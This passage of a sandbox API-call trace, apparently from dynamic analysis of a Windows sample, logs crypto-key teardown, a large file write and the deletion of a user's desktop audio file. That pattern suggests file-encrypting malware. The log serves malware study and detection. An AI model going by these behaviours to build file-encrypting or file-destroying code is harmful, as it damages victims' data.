wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.262] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.262] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.262] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.262] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.262] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.262] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.262] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.262] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.262] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.262] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.262] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.266] WriteFile (in: hFile=0x2c4, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0x9f00, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0x9f00, lpOverlapped=0x0) returned 1 [0090.271] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.272] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.272] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0090.272] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.272] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0090.272] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.272] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.272] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.272] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0090.272] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.272] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0090.272] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0090.272] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9af0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0090.272] CryptDestroyKey (hKey=0x9a3bc0) returned 1 [0090.272] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.272] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.272] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0090.272] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.272] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0090.272] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.272] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.272] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0090.273] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0090.273] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0090.273] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0090.273] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0090.273] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0090.273] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.273] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.273] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0090.273] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.273] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0090.273] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0090.273] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.273] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0090.273] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.273] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0090.273] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.273] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0090.273] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.273] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0090.273] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.273] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.273] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0090.273] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.273] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0090.274] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.274] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.274] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0090.274] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.274] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.274] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.274] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.274] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.274] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0090.274] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.274] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.274] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.274] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.274] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.274] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.278] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0090.279] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.279] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0090.279] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.279] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.279] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0090.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0090.279] CryptReleaseContext (hProv=0x9961a8, dwFlags=0x0) returned 1 [0090.279] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.279] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.279] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.279] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.279] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.279] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0090.279] FreeLibrary (hLibModule=0x76390000) returned 1 [0090.279] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.279] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0090.279] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.279] CloseHandle (hObject=0x294) returned 1 [0090.281] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.281] CloseHandle (hObject=0x2c4) returned 1 [0090.283] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0090.284] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.284] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.284] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.284] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/E hy.wav", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\E hy.wav", lpFilePart=0x8cedf4*="E hy.wav") returned 0x20 [0090.284] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\E hy.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\e hy.wav")) returned 0x20 [0090.284] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\E hy.wav", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebefe850, ftCreationTime.dwHighDateTime=0x1d5c92c, ftLastAccessTime.dwLowDateTime=0x573996f0, ftLastAccessTime.dwHighDateTime=0x1d5d1b7, ftLastWriteTime.dwLowDateTime=0x573996f0, ftLastWriteTime.dwHighDateTime=0x1d5d1b7, nFileSizeHigh=0x0, nFileSizeLow=0x9efc, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="E hy.wav", cAlternateFileName="EHY~1.WAV")) returned 0x9a4200 [0090.284] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\E hy.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\e hy.wav")) returned 1 [0090.285] FindNextFileW (in: hFindFile=0x9a4200, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebefe850, ftCreationTime.dwHighDateTime=0x1d5c92c, ftLastAccessTime.dwLowDateTime=0x573996f0, ftLastAccessTime.dwHighDateTime=0x1d5d1b7, ftLastWriteTime.dwLowDateTime=0x573996f0, ftLastWriteTime.dwHighDateTime=0x1d5d1b7, nFileSizeHigh=0x0, nFileSizeLow=0x9efc, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="E hy.wav", cAlternateFileName="EHY~1.WAV")) returned 0 [0090.285] FindClose (in: hFindFile=0x9a4200 | out: hFindFile=0x9a4200) returned 1 [0090.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75588 | out: hHeap=0x2af0000) returned 1 [0090.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0090.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0090.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.286] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0090.286] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0090.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0090.286] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6108 [0090.286] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0090.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0090.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0090.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0090.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0090.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0090.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0090.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0090.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0090.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75858 [0090.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6108 | out: hHeap=0x2af0000) returned 1 [0090.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0090.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0090.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0090.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0090.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0090.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0090.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0090.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0090.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0090.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0090.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0090.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0090.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0090.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x42) returned 0x2a5d8e0 [0090.287] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/E hy.wav", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\E hy.wav", lpFilePart=0x8cf650*="E hy.wav") returned 0x20 [0090.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d8e0 | out: hHeap=0x2af0000) returned 1 [0090.288] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\E hy.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\e hy.wav")) returned 0xffffffff [0090.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75858 | out: hHeap=0x2af0000) returned 1 [0090.288] HeapFree 